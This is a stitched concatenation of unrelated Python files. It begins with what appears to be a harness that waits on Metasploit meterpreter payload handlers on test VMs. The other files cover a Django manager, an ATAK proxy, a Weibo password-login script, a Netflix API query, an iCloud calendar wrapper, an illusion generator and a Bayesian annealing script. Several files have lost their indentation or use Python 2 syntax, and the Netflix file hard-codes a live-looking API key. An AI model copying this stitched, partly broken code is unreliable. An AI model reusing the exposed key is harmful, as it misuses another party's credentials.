            requiredTargetData.append("METERPRETER_JAVA")
        if hasPythonPayload:
            requiredTargetData.append("METERPRETER_PYTHON")
        for requiredItem in requiredTargetData:
            if requiredItem not in target:
                # BUG FIX: the original concatenated the config dict itself into
                # the message (TypeError); stringify it, and tolerate a missing NAME.
                print("NO " + requiredItem + " LISTED FOR " + target.get('NAME', 'UNNAMED TARGET') + " IN " + str(jsonDic))
                configPassed = False
    if not configPassed:
        return False
    return True
def waitForHttpServer(msfHosts, logFile, httpPort):
    """
    Block until every MSF host's stage-one script has finished, which is
    detected by its Python payload HTTP server appearing in the guest's
    process list on httpPort.

    msfHosts -- list of host dicts with 'NAME' and 'VM_OBJECT'
    logFile  -- destination passed through to logMsg()
    httpPort -- port the stage-one script serves payloads on

    Returns True once every host is serving; False if the user hits Ctrl-C.
    Note: there is no timeout — this polls (1 s interval) until done.
    """
    logMsg(logFile, "WAITING FOR STAGE ONE SCRIPT(S) TO COMPLETE...")
    for host in msfHosts:
        host['SCRIPT_COMPLETE'] = False
    tick = 0
    while True:
        tick += 1
        try:
            time.sleep(1)
        except KeyboardInterrupt:
            return False
        pending = [h for h in msfHosts if not h['SCRIPT_COMPLETE']]
        if not pending:
            return True
        for host in pending:
            if tick % 5 == 0:
                # Throttled progress message, once per host every 5 polls.
                logMsg(logFile, "WAITING FOR PYTHON HTTP SERVER TO START ON " + host['NAME'])
            host['VM_OBJECT'].updateProcList()
            for procEntry in host['VM_OBJECT'].procList:
                if ('python' in procEntry.lower()) and (str(httpPort) in procEntry):
                    logMsg(logFile, "PYTHON HTTP SERVER FOUND ON " + host['NAME'])
                    logMsg(logFile, str(procEntry))
                    host['SCRIPT_COMPLETE'] = True
def waitForMeterpreters(testConfig, sessionCounter, timeoutSec = 500):
    """
    Poll the MSF hosts until the count of running msfconsole processes
    stabilizes, i.e. meterpreter sessions have finished spawning.

    testConfig     -- config dict; uses 'MSF_HOSTS' (each with VM_OBJECT, NAME)
                      and 'LOG_FILE'
    sessionCounter -- currently unused; kept for caller compatibility
    timeoutSec     -- maximum number of 1-second polls

    Returns None (also on Ctrl-C, which just skips the remaining wait).
    """
    modCounter = 0
    previousCount = 0
    currentCount = 0
    staticCount = 0            # consecutive polls with an unchanged count
    finishedSpawning = False   # set once the count first decreases
    try:
        for i in range(timeoutSec):
            if finishedSpawning and staticCount > 25:
                break
            previousCount = currentCount
            currentCount = 0
            for msfHost in testConfig['MSF_HOSTS']:
                msfHost['VM_OBJECT'].updateProcList()
                msfConsoleCount = 0
                for procEntry in msfHost['VM_OBJECT'].procList:
                    if 'msfconsole' in procEntry:
                        msfConsoleCount = msfConsoleCount + 1
                currentCount = currentCount + msfConsoleCount
                # BUG FIX: this log line previously sat outside the per-host
                # loop and used the leaked loop variables, so it only ever
                # reported the last host. Report each host here instead.
                if modCounter % 10 == 0:
                    logMsg(testConfig['LOG_FILE'], str(msfConsoleCount) + " msfconsole PROCESSES STILL RUNNING ON " + msfHost['NAME'])
            if currentCount < previousCount:
                finishedSpawning = True
            if currentCount == previousCount:
                logMsg(testConfig['LOG_FILE'], "NO CHANGE IN METERPRETER PROCESS COUNT [" + str(staticCount) +"]")
                staticCount = staticCount + 1
            else:
                staticCount = 0
            time.sleep(1)
            # BUG FIX: modCounter was never incremented in the original, so the
            # "% 10" throttle above fired on every single pass.
            modCounter = modCounter + 1
    except KeyboardInterrupt:
        print("CAUGHT KEYBOARD INTERRUPT; SKIPPING THE NORMAL WAIT BUT PROCESSING THE DATA AND REVERTING VMS")
    return None
def waitForMsfPayloads(msfHosts, reportDir, logFile, timeoutSec = 300):
    """
    HTTP SERVERS HAVE STARTED; CHECK NETSTAT LOGS TO ENSURE ALL REQUIRED PORTS ARE LISTENING

    Polls every 5 seconds: pulls each host's netstat dump from the guest and
    checks that every port in host['LISTEN_PORTS'] appears in it. Once all
    hosts are ready (or the time budget runs out) a short cool-down follows.

    msfHosts   -- list of host dicts (NAME, MSF_PAYLOAD_PATH, LISTEN_PORTS, VM_OBJECT)
    reportDir  -- local directory where pulled netstat snapshots are kept
    logFile    -- destination passed through to logMsg()
    timeoutSec -- polling budget in seconds (one check per 5 s)

    Returns True when done; False if the user aborts with Ctrl-C.
    """
    # BUG FIX: range(timeoutSec/5) raises TypeError on Python 3 because '/'
    # yields a float; use integer division.
    for waitCycles in range(timeoutSec // 5):
        stageTwoComplete = True
        try:
            logMsg(logFile, "CHECKING netstat OUTPUT")
            for host in msfHosts:
                remoteFile = host['MSF_PAYLOAD_PATH'] + "/netstat.txt"
                hostReady = True
                if 0 == len(host['LISTEN_PORTS']):
                    logMsg(logFile, "NO PORTS REQUIRED FOR " + host['NAME'] + "\n")
                    host['READY'] = True
                if 'READY' in host and host['READY'] == True:
                    logMsg(logFile, "ALL REQUIRED PORTS READY ON " + host['NAME'] + "\n")
                else:
                    logMsg(logFile, "PORT " + str(host['LISTEN_PORTS']) + " SHOULD BE OPEN ON " + host['NAME'] + "\n")
                    localFile = reportDir + "/" + host['NAME'] + "_netstat_" + str(waitCycles) + ".txt"
                    host['VM_OBJECT'].getFileFromGuest(remoteFile, localFile)
                    try:
                        netstatFile = open(localFile, 'r')
                        netstatData = netstatFile.read()
                        netstatFile.close()
                    except Exception as e:
                        logMsg(logFile, "FAILED READING NETSTAT FILE: " + localFile + "\n" + str(e))
                        # IF WE DID NOT GET A FILE, WE CANNOT SAY THAT THE PORTS ARE READY
                        netstatData = ""
                    for port in host['LISTEN_PORTS']:
                        if str(port) not in netstatData:
                            hostReady = False
                            logMsg(logFile, "PORT " + str(port) + " NOT OPEN ON " + host['NAME'] + "\n")
                        else:
                            logMsg(logFile, "PORT " + str(port) + " IS OPEN ON " + host['NAME'] + "\n")
                    if hostReady == False:
                        stageTwoComplete = False
                    else:
                        host['READY'] = True
            if stageTwoComplete == True:
                break
            time.sleep(5)
        except KeyboardInterrupt:
            print("CAUGHT KEYBOARD INTERRUPT; ABORTING TEST AND RESETTING VMS....")
            return False
    # Cool-down: give the reverse handlers a moment to settle.
    coolDownCycles = 3
    for i in range(coolDownCycles):
        # BUG FIX: the original message claimed (n-i)*10 seconds remaining while
        # each pass actually sleeps 5; report the real remaining time.
        logMsg(logFile, "SLEEPING FOR " + str((coolDownCycles - i) * 5) + " SECONDS")
        try:
            time.sleep(5)
        except KeyboardInterrupt:
            print("CAUGHT KEYBOARD INTERRUPT; ABORTING TEST AND RESETTING VMS....")
            return False
    return True
def waitForVms(vmList):
    """
    Block until every VM in vmList has finished booting.

    Relies on VMware Tools being installed and running in each guest
    (vm.waitForVmToBoot()). Returns True when all VMs come up, False as
    soon as one reports failure.
    """
    for vm in vmList:
        booted = vm.waitForVmToBoot()
        # Preserve the original's explicit comparison: only a literal False
        # (not merely a falsy value) counts as a boot failure.
        if booted == False:
            return False
    return True
|
from django.db import models
class ArticleManager(models.Manager):
    """Custom model manager for articles; currently a placeholder with no
    extra queryset behavior beyond Django's default Manager."""
    pass
|
import socket, json, requests
from lxml import etree
# ATAK CoT proxy for CloudRF API
# Listening TCP socket for Cursor-on-Target (CoT) traffic from ATAK clients.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # allow quick restart on the same port
# EDIT ME: Radio templates are read from local JSON files and mapped to ATAK callsigns here
radios = {"CloudRF": "radios/bigradio.json", "droneyMcDroneFace": "radios/drone.json"}
def parseCoT(xml):
    """Extract the callsign and the 5-decimal-rounded lat/lon from a CoT
    event XML string."""
    root = etree.fromstring(xml.encode("utf-8"))
    point = root.xpath("//event/point")[0]
    contact = root.xpath("//event/detail/contact")[0]
    return {
        "cs": contact.attrib["callsign"],
        "lat": round(float(point.attrib["lat"]), 5),
        "lon": round(float(point.attrib["lon"]), 5),
    }
def areaAPI(update):
    """Run a CloudRF area-coverage calculation for one CoT position update.

    Loads the radio template mapped to the callsign, overwrites its lat/lon
    with the CoT position, posts it to the CloudRF area API, and — if the
    response carries a 'kmz' entry — triggers the ATAK archive fetch.
    """
    if update["cs"] not in radios:  # Warn if user didn't setup radios {}
        print("Callsign %s does not have a radio allocated!" % update["cs"])
        return
    print("\nCalculating coverage for c/s %s at %.5f,%.5f using %s..." % (update["cs"],update["lat"],update["lon"],radios[update["cs"]]))
    with open(radios[update["cs"]]) as json_file:
        radio = json.load(json_file)
    radio["lat"] = update["lat"]  # Use loc from CoT message..
    radio["lon"] = update["lon"]
    print(radio)
    r = requests.post("https://cloudrf.com/API/area?atak", data=radio)  # DO IT
    print("\nAPI RESPONSE:\n"+r.text)
    j = json.loads(r.text)
    if 'kmz' in j:
        r = requests.get("https://cloudrf.com/API/archive/data?callsign="+str(update["cs"])+"&atak="+str(j["id"])+"&uid="+str(radio["uid"])+"&key="+radio["key"])  # ATAK fairy
        print(r.text)
s.bind(('', 8099))  # Default TAK server port
s.listen(1)
conn, addr = s.accept()
while 1:
    data = conn.recv(1024)
    # BUG FIX: recv() returns b'' once the client disconnects; the original
    # looped forever echoing empty buffers and never reached conn.close().
    if not data:
        break
    conn.sendall(data)  # Heartbeat expects a copy of the data
    try:
        if "contact" in data.decode("utf-8"):
            update = parseCoT(data.decode("utf-8"))  # Callsign, lat, lon..
            areaAPI(update)
        else:
            print(data)
    except Exception as e:
        # Keep the proxy alive on malformed CoT / API errors; just report.
        print(e)
conn.close()
|
from random import choice
# Build a 16-character password by sampling (with replacement) from the
# allowed character set.
len_of_pass = 16
chars = "abcdefghijklmnopqrstvuwxyz1234567890!@#$%^&*()_+><>~ABCDEFGHIJKLMNOPQRSTUVWXYZ"
random_pass = "".join(choice(chars) for _ in range(len_of_pass))
print(f"Your random password is : {random_pass}")
import socket
import time
"""
Simula la bateria fisica, mediante socket
"""
while True:
try:
cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
direccion_servidor = ("localhost", 11000)
cliente.connect(direccion_servidor)
carga = input("Carga > ")
cliente.send(bytes(carga.encode()))
cliente.close()
except ConnectionError:
print("Intentar de vuelta")
time.sleep(2)
|
from weibo import APIClient
import urllib
import webbrowser #for test
import httplib
import weiboconfig as config
#get the pin code from the redirect_uri
def get_pincode():
client = APIClient(app_key=config.APP_KEY, app_secret=config.APP_SECRET, redirect_uri=config.CALLBACK_URI)
url = client.get_authorize_url()
conn = httplib.HTTPSConnection('api.weibo.com')
postdata = urllib.urlencode({'client_id':config.APP_KEY,'response_type':'code','redirect_uri':config.CALLBACK_URI, \
'action':'submit','userId':config.ACCOUNT,'passwd':config.PASSWORD,'isLoginSina':0,'from':'','regCallback':'', \
'state':'','ticket':'','withOfficalFlag':0})
conn.request('POST','/oauth2/authorize',postdata,{'Referer':url, 'Content-Type':'application/x-www-form-urlencoded'})
res = conn.getresponse()
location = res.getheader('location')
try:
code = location.split('=')[1]
return code
except:
print "error"
if __name__ == "__main__":
print get_pincode()
|
from machine import Pin
import time
# Toggle the output on GPIO2 every two seconds, forever (MicroPython).
led = Pin(2, Pin.OUT)
while True:
    led.off()
    time.sleep(2)
    led.on()
    time.sleep(2)
import requests, json
from pprint import pprint
# Query the (unofficial) Netflix search endpoint on RapidAPI and print the JSON.
url_netflix = "https://netflix-unofficial.p.rapidapi.com/api/search"
headers_netflix = {
    'x-rapidapi-host': "netflix-unofficial.p.rapidapi.com",
    # SECURITY NOTE(review): API key hard-coded in source — rotate this key and
    # load it from an environment variable instead of committing it.
    'x-rapidapi-key': "df04cb6865msha77f6ca500b312ep1202bcjsn9a883a67fa18"
    }
response_netflix = requests.request("GET", url_netflix, headers=headers_netflix)
# Raises a JSON decode error if the endpoint returns a non-JSON body.
data_netflix = response_netflix.json()
print(data_netflix)
|
from pyicloud import PyiCloudService
import os, math
from datetime import datetime, timedelta
# iCloud credentials come from the environment; raises KeyError at import
# time if either variable is unset.
ICLOUD_MAIL = os.environ['ICLOUD_MAIL']
ICLOUD_PSWD = os.environ['ICLOUD_PSWD']
class ICalendar(object):
    """Thin wrapper around the iCloud calendar API.

    On construction it logs in, refreshes the calendar client and caches the
    next 30 days of events in self.events, keyed by 'YYYY-MM-DD' date strings.
    """
    def __init__(self):
        self.api = PyiCloudService(ICLOUD_MAIL, ICLOUD_PSWD)
        self.api.calendar.refresh_client()
        self.events = None
        self.setup_calendar(datetime.now(), datetime.now() + timedelta(days=30))

    @staticmethod
    def _clock(date_fields):
        """Format the hour/minute fields of an iCloud date tuple as 'HH:MM'."""
        hour = str(date_fields[4]).zfill(2)
        minute = str(date_fields[5]).zfill(2)
        return "%s:%s" % (hour, minute)

    def setup_calendar(self, date_from, date_to):
        """Fetch events in [date_from, date_to] and cache them grouped by day."""
        events = {}
        for event in self.api.calendar.events(date_from, date_to):
            # startDate[0] is a YYYYMMDD-style stamp; slice it into a date key.
            stamp = str(event['startDate'][0])
            date = "%s-%s-%s" % (stamp[0:4], stamp[4:6], stamp[6:8])
            events.setdefault(date, []).append({
                'title': event['title'],
                'date': date,
                'location': event['location'],
                'begin': self._clock(event['startDate']),
                'end': self._clock(event['endDate']),
                'duration': event['duration'],
            })
        self.events = events

    def get_events(self, date):
        """Return the day's events sorted by start time, or None if none."""
        if date in self.events:
            return sorted(self.events[date], key=lambda entry: entry['begin'])
        return None

    def get_next_event(self):
        """Return the earliest event within the next 31 days, or None."""
        for offset in range(31):
            day = str(datetime.now() + timedelta(days=offset)).split(" ")[0]
            todays = self.get_events(day)
            if todays:
                return todays[0]
        return None
|
from .delboeuf_image import _delboeuf_image
from .delboeuf_parameters import _delboeuf_parameters
from .delboeuf_psychopy import _delboeuf_psychopy
class Delboeuf:
    """
    A class to generate the Delboeuf Illusion.
    The Delboeuf illusion is an optical illusion of relative size perception,
    where circles of identical size appear as different because of their surrounding context.
    Specifically, the circle that is closely surrounded by a ring appears larger than the circle surrounded by a distant ring.
    Each instance of Delboeuf contains attributes corresponding to the parameters of the illusion.
    Parameters
    ----------
    illusion_strength : float
        The strength of the surrounding context, i.e. outer circles, in biasing perception of unequally sized inner circles.
        Specifically, the size of the outer circle relative to the inner circle (in percentage, e.g, if illusion_strength=1,
        it means that the outer circle will be 100% bigger, i.e., 2 times bigger than the inner circle).
        A negative sign means that the illusion will enhance the perception of the actual difference in circle sizes
        whereas a positive sign reduces this perception.
    difference : float
        The objective size difference of the inner circles.
        Specifically, the size of left inner circle relative to the right (in percentage, e.g., if difference=1,
        it means that the left inner circle will be 100% bigger, i.e., 2 times bigger than the right).
        A negative sign would make the left inner circle smaller than the right inner circle.
    size_min : float
        Size of smaller inner circle. Defaults to 0.25.
    distance : float
        Distance between circles. Defaults to 1.
    distance_auto : bool
        If true, distance is between edges (fixed spacing), if false (default), between centers (fixed location).
    """
    def __init__(
        self, illusion_strength=0, difference=0, size_min=0.25, distance=1, distance_auto=False
    ):
        """
        Compute attributes for the Delboeuf Illusion.
        Parameters
        ----------
        illusion_strength : float
            The strength of the surrounding context, i.e. outer circles, in biasing perception of unequally sized inner circles.
            Specifically, the size of the outer circle relative to the inner circle (in percentage, e.g, if illusion_strength=1,
            it means that the outer circle will be 100% bigger, i.e., 2 times bigger than the inner circle).
            A negative sign means that the illusion will enhance the perception of the actual difference in circle sizes
            whereas a positive sign reduces this perception.
        difference : float
            The objective size difference of the inner circles.
            Specifically, the size of left inner circle relative to the right (in percentage, e.g., if difference=1,
            it means that the left inner circle will be 100% bigger, i.e., 2 times bigger than the right).
            A negative sign would make the left inner circle smaller than the right inner circle.
        size_min : float
            Size of smaller inner circle. Defaults to 0.25.
        distance : float
            Distance between circles. Defaults to 1.
        distance_auto : bool
            If true, distance is between edges (fixed spacing), if false (default), between centers (fixed location).
        """
        # All geometry is delegated to the parameters helper; the instance only
        # stores the resulting dict.
        self.parameters = _delboeuf_parameters(
            illusion_strength=illusion_strength,
            difference=difference,
            size_min=size_min,
            distance=distance,
            distance_auto=distance_auto,
        )
    def get_parameters(self) -> dict:
        """
        Returns a dictionary of parameters passed into the Delboeuf illusion.
        Returns
        --------
        dict
            A dictionary of all parameters passed into the Delboeuf illusion, including:
            - **Difference** : Objective difference in the target features, by modifying `difference` of delboeuf_parameters()
            - **Illusion** : Name of the illusion, Delboeuf.
            - **Illusion_Strength** : The strength of the surrounding context in biasing illusion, by modifying `illusion_strength` of delboeuf_parameters().
            - **Illusion_Type** : `Congruent` if the illusion enhances the perception of the objective difference in the illusion, and `Incongruent` if it reduces the perceived difference.
            - **Size_Inner_Left** : Size of the inner left circle.
            - **Size_Inner_Right** : Size of the inner right circle.
            - **Sine_Inner_Difference** : Difference in areas of the left and right inner circles.
              (NOTE(review): key name presumably "Size_Inner_Difference" — verify against _delboeuf_parameters().)
            - **Size_Outer_Left** : Size of the outer left rim.
            - **Size_Outer_Right** : Size of the outer right rim.
            - **Distance** : Distance between the circles, by modifying `distance` of delboeuf_parameters().
            - **Distance_Reference** : Distance between circles is computed 'Between Edges' or `Between Centers`, by modifying distance_auto of delboeuf_parameters().
            - **Distance_Edges_Inner** : Distance between the edges of the inner left and right circles.
            - **Distance_Edges_Outer** : Distance between the edges of the outer left and right rims.
            - **Size_Inner_Smaller** : Size of the smaller inner circle, equates to size_min of delboeuf_parameters().
            - **Size_Inner_Larger** : Size of the larger inner circle.
            - **Size_Outer_Smaller** : Size of the smaller outer rim.
            - **Size_Outer_Larger** : Size of the larger outer rim.
            - **Position_Left** : Position of the left circle.
            - **Position_Right** : Position of the right circle.
        """
        return self.parameters
    def to_dict(self) -> dict:
        """
        Alias for `get_parameters()`.
        """
        return self.get_parameters()
    def to_image(self, width=800, height=600, outline=10, background="white", **kwargs):
        """Create a PIL image of the Delboeuf illusion.
        Parameters
        ----------
        width : int
            Width of the returned image.
        height : int
            Height of the returned image.
        outline : float
            The width of the outline of the circles in the illusion, passed into `image_circle()`.
        background : str
            Color of the background.
        **kwargs
            Additional arguments passed into `delboeuf_parameters()`.
        Returns
        -------
        Image
            Image of the Delboeuf illusion, defaults to 800 x 600 pixels.
            Can be resized
            (`resize()`, See https://pillow.readthedocs.io/en/stable/reference/Image.html#PIL.Image.Image.resize)
            and saved in different file formats
            (`save()` See https://pillow.readthedocs.io/en/stable/handbook/image-file-formats.html).
        Examples
        ---------
        >>> import pyllusion
        >>>
        >>> delboeuf = pyllusion.Delboeuf(illusion_strength=3)
        >>> delboeuf.to_image()
        """
        img = _delboeuf_image(
            parameters=self.parameters,
            width=width,
            height=height,
            outline=outline,
            background=background,
            **kwargs
        )
        return img
    def to_psychopy(self, window, **kwargs):
        """Create a PsychoPy stimulus of the Delboeuf illusion.
        Parameters
        ----------
        window : object
            The window object initiated by `psychopy.visual.Window` in which the stimulus will be rendered.
        **kwargs
            Additional arguments passed into `delboeuf_parameters()`.
        Returns
        -------
        In-place modification of the PsychoPy window (No explicit return).
        Examples
        ---------
        >>> import pyllusion
        >>> from psychopy import visual, event
        >>> # Create parameters
        >>> delboeuf = pyllusion.Delboeuf(difference=2, illusion_strength=3)
        >>> # Initiate Window
        >>> window = visual.Window(size=[800, 600], winType='pygame', color='white')
        >>> # Display illusion
        >>> delboeuf.to_psychopy(window)
        >>> # Refresh and close window
        >>> window.flip()
        >>> event.waitKeys() # Press any key to close
        >>> window.close()
        """
        _delboeuf_psychopy(window, self.parameters, **kwargs)
|
import numpy as np
import h5py
import pcl
# Build a small HDF5 training set (32 clouds x 2048 points x xyz) from PCD
# files: 16 "car" clouds labeled 0 and 16 "wall" clouds labeled 1.
dataset = np.zeros(shape=(32,2048,3))
labels = np.zeros(shape=(32,1))

def _load_padded_cloud(path, points=2048):
    """Load a PCD file's xyz points, zero-padded to a fixed (points, 3) array.

    NOTE(review): assumes the cloud has at most `points` points — a larger
    cloud would make the pad size negative and np.zeros would raise.
    """
    cloud = pcl.io.loadpcd(path).xyz
    pad = np.zeros((points - cloud.shape[0], 3))
    return np.append(cloud, pad, 0)

# Class 0: cars. (The duplicated load/pad logic and the confusing reuse of
# `x` for both the cloud and the padding in the original are folded into the
# helper above.)
for i in range(0, 16):
    dataset[i] = _load_padded_cloud("car_" + str(i) + ".pcd")
    labels[i] = 0
# Class 1: walls.
for i in range(0, 16):
    dataset[i + 16] = _load_padded_cloud("wall_" + str(i) + ".pcd")
    labels[i + 16] = 1

hf = h5py.File('data.h5','w')
hf.create_dataset('data',data=dataset)
hf.create_dataset('label',data=labels)
hf.close()
|
# Generated by Django 3.2.5 on 2021-08-07 13:00
import colorfield.fields
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration: adds the ExcerptFontColor and
    # ExcerptFontSize lookup tables. Do not hand-edit generated migrations
    # beyond comments; create a new migration for further schema changes.
    dependencies = [
        ('works', '0005_auto_20210807_1256'),
    ]
    operations = [
        migrations.CreateModel(
            name='ExcerptFontColor',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('value', colorfield.fields.ColorField(default='#FFFFFF', max_length=18, verbose_name='hexa')),
            ],
            options={
                'verbose_name_plural': 'Excerpt Font Colors',
            },
        ),
        migrations.CreateModel(
            name='ExcerptFontSize',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('value', models.CharField(max_length=3)),
            ],
            options={
                'verbose_name_plural': 'Excerpt Font Sizes',
            },
        ),
    ]
|
import fitsio
import os
import numpy as np
from scipy.stats import invgamma, dirichlet, multivariate_normal, norm
import urllib
import random
# Bayesian model selection scheme
#
# Let's say we have model M. Then, the model evidence is:
# P(M | D) \propto P(D | M) P(M)
# Typically, we will assume P(M) is uniform across the finite number of models.
# P(D | M) is called the marginal likelihood and is:
# \int P(D | M, theta) P(theta | M) dtheta
# We use importance simulated annealing
# Number of independent annealing runs used to estimate the marginal likelihood.
TRIALS = 10000
def uniform_logpdf(x, start, end):
    """Log-density of a Uniform(start, end) distribution at x.

    Returns -inf outside the support, else -log(end - start).
    """
    inside_support = start <= x <= end
    return -np.log(end - start) if inside_support else -np.inf
# Packed parameter vector layout: [weights | means | scales], `components` of each.
COV_ALPHA = 5  # covariance scale of the log-normal prior on weights
# define uniform interval for the component means
START = 0
END = 10000
A = 1  # inverse-gamma shape parameter for the scale prior
LOC = 10  # inverse-gamma location
SCALE = 10  # inverse-gamma scale
components = 10  # number of Gaussian components in the mixture model
def simple_model_sample_prior():
    """Draw one packed parameter vector [weights | means | scales] from the prior.

    Weights are log-normal, means uniform on [START, END], and scales
    inverse-gamma distributed.
    """
    sample = np.zeros(3 * components)
    # Log-normal weights: exp of a zero-mean Gaussian draw.
    sample[:components] = \
        np.exp(multivariate_normal.rvs(cov=COV_ALPHA*np.eye(components)))
    # Uniform means on [START, END].
    for idx in range(components, 2*components):
        sample[idx] = random.random() * (END - START) + START
    # Inverse-gamma scales.
    sample[(2*components):(3*components)] = \
        invgamma.rvs(A, LOC, SCALE, size=components)
    return sample
def simple_model_prior_logpdf(values):
    """Log prior density of a packed [weights | means | scales] vector."""
    weight_term = multivariate_normal.logpdf(values[:components],
                                             mean=np.zeros(components),
                                             cov=COV_ALPHA*np.eye(components))
    mean_term = np.sum([uniform_logpdf(v, START, END)
                        for v in values[components:(2*components)]])
    scale_term = np.sum([invgamma.logpdf(v, A, LOC, SCALE)
                         for v in values[(2*components):(3*components)]])
    return weight_term + mean_term + scale_term
def simple_model_posterior_logpdf(values, data):
    """Unnormalized log posterior of the Gaussian-bump mixture model.

    values -- packed parameter vector [weights | means | scales]
    data   -- list of spectrum dicts with 'lam', 'flux' and 'ivar' arrays
    """
    # NOTE(review): a log-probability accumulator would normally start at 0;
    # starting at 1 adds a constant offset to every evaluation — confirm intent.
    prob = 1
    for datum in data:
        lambdas = datum['lam']
        spec = datum['flux']
        ivar = datum['ivar']
        for i in range(len(lambdas)):
            # ivar == 0 marks an unusable pixel; skip it.
            if ivar[i] != 0:
                # Model prediction: weighted sum of Gaussian bumps in wavelength.
                pred = 0
                for n in range(components):
                    weight = values[n]
                    mean = values[components + n]
                    scale = values[2 * components + n]
                    pred += np.exp(-(lambdas[i] - mean)**2 / scale) * weight
                # Gaussian likelihood with sigma = 1/sqrt(ivar).
                prob += norm.logpdf(spec[i], pred, 1 / np.sqrt(ivar[i]))
    return prob + simple_model_prior_logpdf(values)
MEAN_VAR = 10   # proposal variance for the component means
VAR_VAR = 10    # proposal variance for the component scales
WEIGHT_VAR = 1  # proposal variance for the log-weights
def propose(values, log_likelihood):
    """One Metropolis-Hastings step over the packed parameter vector.

    values         -- current [weights | means | scales] vector
    log_likelihood -- callable returning the (tempered) log density
    Returns the accepted vector, or a copy of `values` if the move is rejected.
    """
    trials = 1
    curr_values = np.copy(values)
    for i in range(trials):
        # propose weights in log space (keeps them positive)
        log_weights = np.log(values[:components])
        new_log_weights = multivariate_normal.rvs(mean=log_weights, cov=np.eye(components)*WEIGHT_VAR)
        # convert from softmax
        new_weights = np.exp(new_log_weights)
        # propose means
        means = values[components:(2*components)]
        new_means = multivariate_normal.rvs(mean=means, cov=np.eye(components)*MEAN_VAR)
        # propose variances
        variances = values[(2*components):(3*components)]
        new_vars = multivariate_normal.rvs(mean=variances, cov=np.eye(components)*VAR_VAR)
        new_value = np.append(new_weights, np.append(new_means, new_vars))
        try:
            prob_new = log_likelihood(new_value)
            prob_old = log_likelihood(values)
        # BUG FIX: was a bare `except:` which also swallowed KeyboardInterrupt
        # and SystemExit; only skip the proposal on genuine evaluation errors.
        except Exception:
            continue
        if prob_new == -np.inf or prob_old == -np.inf:
            continue
        # NOTE(review): the positivity check below inspects the *current*
        # means/variances rather than the proposed ones — confirm intent.
        if np.all(means >= 0) and np.all(variances >= 0) and \
            (prob_new > prob_old or random.random() < np.exp(prob_new - prob_old)):
            curr_values = np.copy(new_value)
    return curr_values
# Annealing temperature ladder (betas): densely spaced near 0, coarser up to 1.
# Used by simulated_annealing() to interpolate prior -> posterior.
# NOTE(review): 0.1 appears at the end of the first segment and the start of
# the second, so one beta value is duplicated — confirm that is intended.
# proposal variance and dimensions are configured above.
betas = np.append(np.linspace(0,0.1,num=10), np.linspace(0.1,1,num=10))
def get_intermediate(prior, posterior, x, data, beta):
    """Tempered density: prior(x)^(1-beta) * posterior(x, data)^beta.

    prior     -- callable density p(x)
    posterior -- callable density p(x, data)
    beta      -- interpolation exponent in [0, 1] (0 = prior, 1 = posterior)
    """
    # BUG FIX: the body referenced undefined names prior_pdf/posterior_pdf
    # instead of the `prior`/`posterior` parameters, raising NameError on call.
    return prior(x)**(1 - beta) * posterior(x, data)**beta
def simulated_annealing(sample_prior, prior_pdf, posterior_pdf, propose, data):
    """Estimate the marginal likelihood by annealed importance sampling.

    Each of TRIALS runs starts from a prior draw and anneals through `betas`
    via Metropolis steps; importance log-weights accumulate across runs and a
    running estimate is printed each iteration (Python 2 print statement).
    Returns the final estimate.
    """
    # NOTE(review): sum_weights/weighted_sum/likelihoods are assigned but never
    # used — candidates for removal.
    sum_weights = 0
    weighted_sum = 0
    log_weights = np.array([])
    log_posteriors = np.array([])
    for i in range(TRIALS):
        values = np.zeros((len(betas), 3 * components))
        likelihoods = np.zeros(TRIALS)
        # sample from prior
        values[0,:] = sample_prior()
        for j in range(1, len(betas)):
            # Metropolis step on the tempered density.
            # NOTE(review): the target here mixes log densities linearly,
            # unlike get_intermediate() which mixes raw densities by powers —
            # confirm which is intended.
            #print values[j-1][0]
            values[j,:] = \
                propose(values[j-1,:],
                    lambda x:(prior_pdf(x)*(1 - betas[j]) + posterior_pdf(x, data)*betas[j]))
        # Accumulate the annealed-importance-sampling log-weight for this run.
        log_weight = 0
        for j in range(1, len(betas)):
            log_weight += \
                prior_pdf(values[j,:])*(betas[j-1] - betas[j]) + \
                posterior_pdf(values[j,:], data)*(betas[j] - betas[j-1])
        log_weights = np.append(log_weights, log_weight)
        log_posteriors = np.append(log_posteriors,
            posterior_pdf(values[len(betas)-1,:], data))
        # Normalize weights in log space (subtract the max for stability).
        log_weights_sub = log_weights - np.max(log_weights)
        #print log_weights_sub
        weights = np.exp(log_weights_sub)
        weights /= np.sum(weights)
        est = np.dot(weights, np.exp(log_posteriors))
        print "marginal likelihood for iteration %d: %g" % (i, est)
    return est
#
# Constructs a path to the spec file online given plate, mjd, fiber -
# which is information about the spec instrument/run
#
def spec_url(plate, mjd, fiber):
    """Return the SDSS DR12 BOSS spectrum URL for a (plate, mjd, fiber) triple.

    plate and fiber are zero-padded to 4 digits, mjd to 5.
    """
    base = "http://data.sdss3.org/sas/dr12/boss/spectro/"
    relative = "redux/v5_7_0/spectra/%04d/spec-%04d-%05d-%04d.fits" % (
        plate, plate, mjd, fiber)
    return os.path.join(base, relative)
if __name__=="__main__":
# load source file - has information about spec collection
df = fitsio.FITS('PhotoSpecBoss_andrewcmiller.fit')
sources = df[1].read()
# easily identify which objects are which
gal_idx = sources['class'] == "GALAXY"
qso_idx = sources['class'] == "QSO"
str_idx = sources['class'] == "STAR"
print "%d galaxies"%sum(gal_idx)
# grab the URL for the first star
s = sources[str_idx][0]
first_star = spec_url(s['plate'], s['mjd'], s['fiberID'])
print first_star
f = urllib.urlopen(first_star)
out = open('spec.fits', 'wb')
out.write(f.read())
out.close()
df = fitsio.FITS('spec.fits')
spec_info = {}
spec_info['lam'] = np.power(10., df[1]['loglam'].read())
spec_info['flux'] = df[1]['flux'].read()
spec_info['ivar'] = df[1]['ivar'].read()
print spec_info
# get actual spectrum
simulated_annealing(simple_model_sample_prior,
simple_model_prior_logpdf,
simple_model_posterior_logpdf,
propose,
[spec_info])
|
"""
文件缓冲区的处理
f.write() :将字符串写到缓冲区
f.close() :将缓冲区的内容写入文件,并且将缓冲区清空,同时关闭文件
f.flush() :将缓冲区的内容写入文件,但是不清空缓冲区内容
f.read() :将内容读取到缓冲区
time.sleep(10):文件对象暂停10秒再进行之后的操作
"""
